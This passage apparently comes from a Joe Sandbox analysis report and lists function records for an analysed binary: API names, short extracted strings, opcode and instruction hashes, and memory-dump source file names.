                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                        • API String ID: 0-3307990326
                                                                                                                                                                                                                                        • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                        • Instruction ID: 9e3f2e29351f33121b07bf26f575b84b8bf1ae95633c2d236521c02d6c504c0c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5481FD756007128FC769CF29C890A63B7F2FF95710B29859EC8824FB65E734E841CB54
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                        • API String ID: 2994545307-936430989
                                                                                                                                                                                                                                        • Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                        • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                        • API String ID: 0-936430989
                                                                                                                                                                                                                                        • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                        • Instruction ID: 3f26747ad08cbbca792645c6ccf952dcc17fded79daa1b97200da73a5e01b686
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A982F8786093506BD7948F28D880B3FBBE2EBC6714F38892DE58557391D771D842CB46
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Uninitialize
                                                                                                                                                                                                                                        • String ID: PT
                                                                                                                                                                                                                                        • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                        • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                        • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Uninitialize
                                                                                                                                                                                                                                        • String ID: PT
                                                                                                                                                                                                                                        • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                        • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                        • Instruction ID: e34b0fbf6d84a2b85abe9a7d1c6fcb2308c971b2e9bf59b8bc3688ad08dbf50a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83A1F2B46087918FD726CF39C4A0AA2BFE1EF57204B58869DC4D24FB66D339D406CB25
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: BE$de
                                                                                                                                                                                                                                        • API String ID: 0-1272349043
                                                                                                                                                                                                                                        • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                        • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: BE$de
                                                                                                                                                                                                                                        • API String ID: 0-1272349043
                                                                                                                                                                                                                                        • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                        • Instruction ID: 1a762800d365188687e1949390672e45eded9f201f8c8f9ef10ceda913e4fb67
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58D1F77164C3648BD725DF2888516EFBBE2EFC1208F18492DE8D19B391D675C506CB92
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: @$ihgf
                                                                                                                                                                                                                                        • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                        • Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                        • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: @$ihgf
                                                                                                                                                                                                                                        • API String ID: 0-73152791
                                                                                                                                                                                                                                        • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                        • Instruction ID: 9ecd676dbe7eba4f330a7565fd96e4ed1412776b0115a0b8468e56edf1d3db07
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 474106B16043018BEB14DF28C88177BB7A6FF81319F14862ED4969B390E7359905CB92
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Z\$^P
                                                                                                                                                                                                                                        • API String ID: 0-3724859648
                                                                                                                                                                                                                                        • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                        • Instruction ID: d0e97233ce6c0b2bb1f2680a284f9e526002128e2cb9440206422db3aab6030b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B441E0B5A11600CFC719CF28C891A66B7B2FF49314B16819DD49A9F7A4E738E401CF55
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: AzB$`rB
                                                                                                                                                                                                                                        • API String ID: 0-365317308
                                                                                                                                                                                                                                        • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                        • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: AzB$`rB
                                                                                                                                                                                                                                        • API String ID: 0-365317308
                                                                                                                                                                                                                                        • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                        • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: c$
                                                                                                                                                                                                                                        • API String ID: 0-2516980088
                                                                                                                                                                                                                                        • Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                        • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: A67H
                                                                                                                                                                                                                                        • API String ID: 0-3389657328
                                                                                                                                                                                                                                        • Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                        • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: [
                                                                                                                                                                                                                                        • API String ID: 0-3878419350
                                                                                                                                                                                                                                        • Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                        • Instruction ID: f38f81cddf609155c09a135ed9160020d4f77e50be5b3bb9523542c530d501b7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50021079600702CBCB24CF29C8D1673B7F2FF99714B29859DC4864BBA5EB39A442CB54
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: ,)*k
                                                                                                                                                                                                                                        • API String ID: 2994545307-1228391949
                                                                                                                                                                                                                                        • Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                        • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ,)*k
                                                                                                                                                                                                                                        • API String ID: 0-1228391949
                                                                                                                                                                                                                                        • Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                        • Instruction ID: a3e959b3411cbe8836f04771e7512f4ee67a84e4f147c114abe830d688611dc1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3DC15975A083505BEB24DF61C880A3FFBE6ABD6715F198A2EE58757780D7319C40CB82
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: m
                                                                                                                                                                                                                                        • API String ID: 0-3775001192
                                                                                                                                                                                                                                        • Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                        • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: 167H
                                                                                                                                                                                                                                        • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                        • Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                        • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 167H
                                                                                                                                                                                                                                        • API String ID: 0-2704650348
                                                                                                                                                                                                                                        • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                        • Instruction ID: 7e6cb8b3ccec96b2211fc08ec0a691d00ed699477dc869af8b87a61b5c40516d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DBD189726043504BD714CF28CCA17ABB792EFD5314F99862EE9958B3C1DB35D906CB81
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                        • API String ID: 0-1505114982
                                                                                                                                                                                                                                        • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                        • Instruction ID: e22d1cfabb2b03b9d946b8363fc2509231edc48f64d1f9603e0359d2ead130ae
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CC1F7B5D00611CBCB24CF69C8917BBB7B1FF85314F29825ED899AB790E734A941CB90
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                        • API String ID: 0-1505114982
                                                                                                                                                                                                                                        • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                        • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &#
                                                                                                                                                                                                                                        • API String ID: 0-1789715784
                                                                                                                                                                                                                                        • Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                        • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: &#
                                                                                                                                                                                                                                        • API String ID: 0-1789715784
                                                                                                                                                                                                                                        • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
